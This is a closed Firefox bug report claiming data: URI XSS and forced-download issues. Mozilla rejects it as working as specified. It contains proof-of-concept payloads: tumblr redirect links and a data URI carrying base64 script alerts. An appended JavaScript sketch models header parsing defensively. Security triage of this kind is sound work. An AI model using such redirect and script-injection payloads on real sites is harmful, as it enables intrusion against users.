Closed
Bug 1351018
Opened 8 years ago
Closed 8 years ago
Data Scheme URI + Automatic Download
Categories
(Firefox :: Untriaged, defect)
RESOLVED
INVALID
People
(Reporter: anasmahmood999, Unassigned)
Attachments (1 file): 6.17 MB, video/avi
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507
Firefox for Android
Steps to reproduce:
The Data URI Scheme executes script using ‘text/html’, which makes the browser render it as a webpage.
A hacker or attacker can perform several types of malware attacks by taking advantage of the Data URI Scheme, which could result in UXSS, Open Redirection, Spoofing and others.
http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg%3D%3D&t=NWI3MzFjMDEzYmI5ZTQzMjJlNzhmOTNhYjJkMWQ1ZTYyMzVlYjAyNiw5OXlxQ2FuOQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158706726327%2Fpoc-click-me-poc-click-me&m=1
We can do everything with data URI
OK...
Now today, when I was playing with data URIs and typed the URI "daTa:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%23http://" in the search bar of the browser, the browser downloaded it as a file.
This occurs due to the URL-encoded (;), i.e. (%3B), after html.
http://t.umblr.com/redirect?z=daTa%3Atext%2Fhtml%253Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%2523http%3A%2F%2F&t=OWMxNDQ2NmQ0NTM0M2FmZjU1NjEyNjgyMDk4NmJhM2JiMDk3MmYyOCxrTGdCU2ZnRQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158898456792%2Fclick&m=1
Through this, an attacker can take advantage and download malicious files to the victim's PC.
This vulnerability exists in all versions of Firefox (52 latest).
I also checked this bug on other browsers, but it only exists in Mozilla Firefox.
Actual results:
URI Download
Expected results:
URI should not download
Comment 1•8 years ago
This appears to be working as specified. We are exploring changing the URL inheritance of data: URIs in other bugs.
In your second issue there are several legitimate ways to trigger a download; this is not a danger. You could, for example, use data:application/octet-stream;base64,blablah. In your case the %3B makes us see "html%3bbase64" run together. Since we don't have a handler for that content-type we offer to download it in case the user has a local program that can handle it. A web page could also use the "download" attribute on a link to force a download for whatever type of URL it is.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
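The header parsing that comment 1 describes, as an added sketch that is not Firefox's code and not part of the original bug. The function names and the `RENDERABLE` set are assumptions made for illustration, and the sample URIs are constructed with a benign payload. It also shows why a link filter that percent-decodes before checking the type sees something different from what the browser sees.

```javascript
// Simplified model of data: URL header handling (RFC 2397 syntax).
// Assumption: RENDERABLE stands in for "types the browser has a handler for".
const RENDERABLE = new Set(["text/html", "text/plain", "image/png"]);

// Browser-style view: split the header on literal ";" only.
// The header is not percent-decoded first, so "%3B" stays in the type token.
function parseDataUrlHeader(url) {
  const m = /^data:([^,]*),/i.exec(url); // scheme is case-insensitive
  if (!m) return null;
  const parts = m[1].split(";");
  const mediaType = (parts.shift() || "text/plain").trim().toLowerCase();
  const base64 = parts.some((p) => p.trim().toLowerCase() === "base64");
  return { mediaType, base64 };
}

// Unknown media type -> offered as a download instead of being rendered.
function dispositionFor(url) {
  const h = parseDataUrlHeader(url);
  if (h === null) return "invalid";
  return RENDERABLE.has(h.mediaType) ? "render" : "download";
}

// Filter-style view: percent-decode the header before splitting.
// A filter written this way disagrees with the parser above on "%3B".
function decodeFirstMediaType(url) {
  const m = /^data:([^,]*),/i.exec(url);
  if (!m) return null;
  let header;
  try { header = decodeURIComponent(m[1]); } catch { return null; }
  return (header.split(";")[0] || "text/plain").trim().toLowerCase();
}

// True when the two views disagree, which is worth logging in a URL filter.
function hasParserDifferential(url) {
  const h = parseDataUrlHeader(url);
  return h !== null && h.mediaType !== decodeFirstMediaType(url);
}

// Constructed samples; the payload is base64 of "<p>hi</p>".
const samples = [
  "data:text/html;base64,PHA+aGk8L3A+",
  "daTa:text/html%3Bbase64,PHA+aGk8L3A+",
  "data:application/octet-stream;base64,AAAA",
];
for (const s of samples) {
  console.log(dispositionFor(s), parseDataUrlHeader(s).mediaType, hasParserDifferential(s));
}
```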